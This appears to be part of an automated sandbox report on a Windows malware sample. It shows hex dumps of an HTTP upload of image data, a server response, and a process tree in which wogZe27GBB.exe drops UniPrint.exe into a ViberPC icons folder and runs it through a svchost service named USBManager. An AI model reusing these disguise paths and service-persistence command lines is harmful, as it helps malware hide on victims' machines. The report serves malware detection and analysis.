                                                                                                                  Data Ascii: iPS4\DB.Nj]{Ower0E_H5f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,p/Y%=.@{
                                                                                                                  2021-09-15 12:04:29 UTC169OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                  Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                  2021-09-15 12:04:29 UTC185OUTData Raw: 63 fc 28 fe c9 b7 fe fc bf 98 ff 00 0a db ea b5 0c 3e b5 4c c6 a2 b6 bf b2 6d ff 00 bf 2f e6 3f c2 8f ec 9b 7f ef cb f9 8f f0 a7 f5 6a 81 f5 aa 66 2d 18 ad 9f ec 9b 7f ef cb f9 8f f0 aa d7 f6 31 5b 40 af 1b 39 25 b1 f3 11 e8 6a 65 87 9c 55 d9 51 c4 42 4e c8 ce c5 18 a5 a0 d6 06 e3 68 a5 a2 80 12 8a 5a 31 4a c0 25 14 b8 a4 c5 16 18 51 46 28 a2 c0 14 51 45 00 14 b4 95 a3 a7 68 7a a6 a9 0b 4b a7 d9 bc e8 8d b5 8a 91 c1 eb eb 43 76 dc 2d 73 3e 92 b7 3f e1 10 f1 0f fd 02 a7 fd 3f c6 8f f8 44 3c 43 ff 00 40 a9 ff 00 4f f1 a3 9a 3d c7 ca fb 18 74 55 ed 43 47 d4 74 c5 0d 7d 69 24 21 8e 01 6c 75 eb 8e 3e b5 4a 9a 77 13 d0 4a 5a 4a 28 10 b4 51 45 00 14 54 f6 76 b3 de dd 25 b5 ac 66 49 a4 38 55 04 73 de b5 7f e1 10 f1 0f fd 02 a6 fc c7 f8 d0 e4 96 e0 93 7b 18 74 b5
                                                                                                                  Data Ascii: c(>Lm/?jf-1[@9%jeUQBNhZ1J%QF(QEhzKCv-s>??D<C@O=tUCGt}i$!lu>JwJZJ(QETv%fI8Us{t
                                                                                                                  2021-09-15 12:04:29 UTC201OUTData Raw: 9f b5 43 b3 31 e8 ad 36 d2 cf f0 b0 35 0b e9 f3 2f 45 cd 35 52 3d c2 cc a7 45 4c d6 d2 af 54 3f 95 44 51 87 50 6a d3 4c 42 51 46 28 a6 01 4b 49 45 02 1d 4b 9a 6d 28 a0 43 aa 7b e3 ff 00 14 d3 7f d7 51 55 c5 4d 7e 7f e2 9a 61 ff 00 4d 85 61 88 d9 1b e1 fe 33 86 34 52 9a 92 de da e2 e5 ca 5b 41 2c cc 06 e2 b1 a1 62 07 af 1f 5a f2 cf 68 8a 8a b5 fd 99 a8 7f cf 85 d7 fd f9 6f f0 a5 fe cc d4 3f e7 c6 eb fe fc b7 f8 53 b3 15 d1 52 8a b7 fd 99 a8 7f cf 8d d7 fd f9 6f f0 a4 fe cc d4 3f e7 c6 eb fe fc b7 f8 51 66 3b a2 ad 15 6f fb 33 50 3d 2c 2e bf ef cb 7f 85 41 3c 13 5b 49 e5 dc 43 24 4e 3f 85 d4 a9 fc 8d 01 72 3a 28 a2 90 05 14 51 40 05 14 51 4c 02 8a 28 a0 02 8a 28 a0 02 96 92 94 50 01 45 14 50 20 a5 a4 a5 a6 01 4b 49 4a 28 01 69 45 02 96 a9 22 5b 17 14 62 96
                                                                                                                  Data Ascii: C165/E5R=ELT?DQPjLBQF(KIEKm(C{QUM~aMa34R[A,bZho?SRo?Qf;o3P=,.A<[IC$N?r:(Q@QL((PEP KIJ(iE"[b
                                                                                                                  2021-09-15 12:04:29 UTC217OUTData Raw: 8c 57 f1 18 99 a5 a4 a3 e9 5b 9c c2 e6 8a 4a 5e 68 04 28 34 e1 4d c5 38 54 96 85 a7 0a 65 3c 52 65 21 68 a2 8a 45 21 c2 9c 29 a3 8a 70 15 2c b4 38 53 85 20 14 ec 54 b3 44 2d 2d 26 29 40 a4 ca 43 85 38 53 40 a7 0a 86 52 1c 29 d9 a6 0a 78 a4 cb 42 8a 75 34 53 aa 59 48 70 ae 1b c6 80 0b 8b 6c 7f 75 bf 9d 77 03 bd 70 de 34 ff 00 8f 9b 7f f7 1b f9 d5 52 dc 53 38 4a 4d a0 9c 9a 76 28 ac 6c 75 dc 69 45 3d a8 d8 a7 b5 3a 8a 2c 82 ec 6e c5 f4 a5 d8 3d 29 d4 51 64 2b b1 a5 14 f6 a0 46 a0 f4 a7 52 d3 b2 0b b0 a5 23 23 06 92 96 98 86 f9 6b 8c 50 10 28 c0 14 ea 28 b2 0b b1 bb 17 d2 8d 8b e9 4f a4 a2 c8 2e c6 ec 5f 4a 36 2f a5 3a 8a 2c 82 ec 6f 96 be 94 bb 17 18 c5 2d 14 59 05 d8 01 8a 6e c5 cd 3a 96 9d 85 71 9e 5a 9e a2 97 ca 4f 4a 75 2d 16 41 76 37 62 ed c6 38 a7 47
                                                                                                                  Data Ascii: W[J^h(4M8Te<Re!hE!)p,8S TD--&)@C8S@R)xBu4SYHpluwp4RS8JMv(luiE=:,n=)Qd+FR##kP((O._J6/:,o-Yn:qZOJu-Av7b8G
                                                                                                                  2021-09-15 12:04:29 UTC233OUTData Raw: 90 ed 6c bf f1 2e 75 91 b0 fc ce cb b4 02 78 e3 e5 45 5e fd 33 59 54 51 c8 83 99 93 5e 5e 5d 5f dc 9b 8b db 89 a7 7e 42 99 64 2e 54 67 38 04 f6 e6 a2 a4 a5 aa 8a 49 59 0a 4d b7 76 58 b1 bb 6b 2b a1 30 8d 25 52 ac 8f 1b e7 0e 8c 08 61 c7 23 83 d6 b4 ad 35 6d 32 ca 14 36 76 97 70 cb 1d cc 73 90 f2 2c be 78 43 90 85 b0 bb 06 79 e1 5b 27 e9 58 b4 52 94 6e 0a 56 34 6d b5 89 20 d3 2f ec 9a dc 48 2e b3 e5 be ec 34 19 65 66 c7 1c 83 b5 78 f6 cd 25 ee a1 6b 7b e6 5c 4b 61 22 df ca 3f 79 2a cf 88 d9 bb b6 cd b9 c9 ff 00 7b 19 ed da a8 51 49 53 48 6e 6d ee 5c 6d 4e 72 ba 61 88 14 93 4d 52 23 72 d9 c9 de 5c 1c 76 eb 8c 7b 54 cb a9 58 c3 7d 6f 7b 6b a5 c9 14 d1 ce 93 32 fd a7 31 f0 41 21 46 dc ae 48 ee 5b 02 b3 68 a7 c8 89 e6 66 a2 6a f1 5b 5c c2 f6 36 32 47 12 dd a5
                                                                                                                  Data Ascii: l.uxE^3YTQ^^]_~Bd.Tg8IYMvXk+0%Ra#5m26vps,xCy['XRnV4m /H.4efx%k{\Ka"?y*{QISHnm\mNraMR#r\v{TX}o{k21A!FH[hfj[\62G
                                                                                                                  2021-09-15 12:04:29 UTC249OUTData Raw: 3f 3a 00 dd a2 b9 d8 af b5 09 6d d6 13 34 91 4a 2f fe ce 5e 44 8c be c2 9b b9 0b 95 cf 3d b8 e0 7b d5 b8 0d e5 e5 e5 cc 6b 7f 2c 49 66 eb 10 c2 21 32 9d a1 8b 36 57 be 71 f2 e3 bf e0 7f 5f d7 de 06 aa 48 92 02 63 75 60 a4 a9 da 73 82 3a 8f ad 3a b9 a8 e4 ba b4 8e 6b b4 ba 22 21 a9 18 cc 01 17 6b 2b 49 b4 e4 91 9c f3 91 82 07 1d 2b a5 a1 6d 70 ea 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 55 ef ae 85 9d b8 99 94 30 32 c7 19 c9 c6 37 3a ae 73 ed bb 3f 85 00 67 c5 aa de bd 9d ad ec 96 36 eb 6d 70 62 c1 5b 96 2e 04 8c a0 7c bb 00 fe 21 9e 6b 62 b9 78 75 1b 16 f0 de 97 6a b7 b6 c6 e1 0d 98 68 84 ab bc 15 78 f7 64 67 3c 60 e7 d3 15 d0 d8 5c fd b3 4f b6 bb d9 b3 cf 89 64 db 9c ed dc 01 c6 7f 1a 00 9e be
                                                                                                                  Data Ascii: ?:m4J/^D={k,If!26Wq_Hcu`s::k"!k+I+mpQEQEQEQEQEQEQEQEQU027:s?g6mpb[.|!kbxujhxdg<`\Od
                                                                                                                  2021-09-15 12:04:29 UTC253OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 33 35 33 39 36 32 34 33 2d 2d 0d 0a 0d 0a
                                                                                                                  Data Ascii: ----------2035396243--
                                                                                                                  2021-09-15 12:04:45 UTC253INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 15 Sep 2021 12:04:29 GMT
                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                  Set-Cookie: X-Csrf-Token=de5f0361007133ed686f9f9b497f1c151344a7333ba257d61d5ad0f0db622324; expires=Thu, 15-Sep-2022 12:04:30 GMT; Max-Age=31536000; httponly
                                                                                                                  Content-Length: 48
                                                                                                                  Connection: close
                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                  2021-09-15 12:04:45 UTC253INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                                  Data Ascii: y80aRR64VR1K\!~v]


                                                                                                                  Code Manipulations

                                                                                                                  Statistics

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  Analysis Process: wogZe27GBB.exe PID: 7160 Parent PID: 6004

                                                                                                                  General

                                                                                                                  Start time:14:01:48
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\Desktop\wogZe27GBB.exe'
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1773472 bytes
                                                                                                                  MD5 hash:5EFC68ABD7FEC415E34980D95A06A66A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low

                                                                                                                  Analysis Process: UniPrint.exe PID: 4260 Parent PID: 7160

                                                                                                                  General

                                                                                                                  Start time:14:01:51
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:4375848 bytes
                                                                                                                  MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, Metadefender, Browse
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:low

                                                                                                                  Analysis Process: UniPrint.exe PID: 5356 Parent PID: 5060

                                                                                                                  General

                                                                                                                  Start time:14:01:58
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:4375848 bytes
                                                                                                                  MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low

                                                                                                                  Analysis Process: svchost.exe PID: 4296 Parent PID: 568

                                                                                                                  General

                                                                                                                  Start time:14:01:59
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                  Imagebase:0x7ff6eb840000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Analysis Process: svchost.exe PID: 5904 Parent PID: 568

                                                                                                                  General

                                                                                                                  Start time:14:02:06
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
                                                                                                                  Imagebase:0xb60000
                                                                                                                  File size:44520 bytes
                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Analysis Process: svchost.exe PID: 6852 Parent PID: 568

                                                                                                                  General

                                                                                                                  Start time:14:02:14
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                  Imagebase:0x7ff6eb840000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Analysis Process: UniPrint.exe PID: 6952 Parent PID: 3424

                                                                                                                  General

                                                                                                                  Start time:14:02:17
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:4375848 bytes
                                                                                                                  MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Analysis Process: UniPrint.exe PID: 7016 Parent PID: 5060

                                                                                                                  General

                                                                                                                  Start time:14:02:22
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:4375848 bytes
                                                                                                                  MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Analysis Process: UniPrint.exe PID: 7080 Parent PID: 3424

                                                                                                                  General

                                                                                                                  Start time:14:02:26
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:4375848 bytes
                                                                                                                  MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Analysis Process: svchost.exe PID: 6408 Parent PID: 568

                                                                                                                  General

                                                                                                                  Start time:14:02:29
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                  Imagebase:0x7ff6eb840000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Analysis Process: UniPrint.exe PID: 6484 Parent PID: 5060

                                                                                                                  General

                                                                                                                  Start time:14:02:32
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:4375848 bytes
                                                                                                                  MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Analysis Process: svchost.exe PID: 5248 Parent PID: 568

                                                                                                                  General

                                                                                                                  Start time:14:02:39
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                  Imagebase:0x7ff6eb840000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Disassembly

                                                                                                                  Code Analysis

                                                                                                                  Reset < >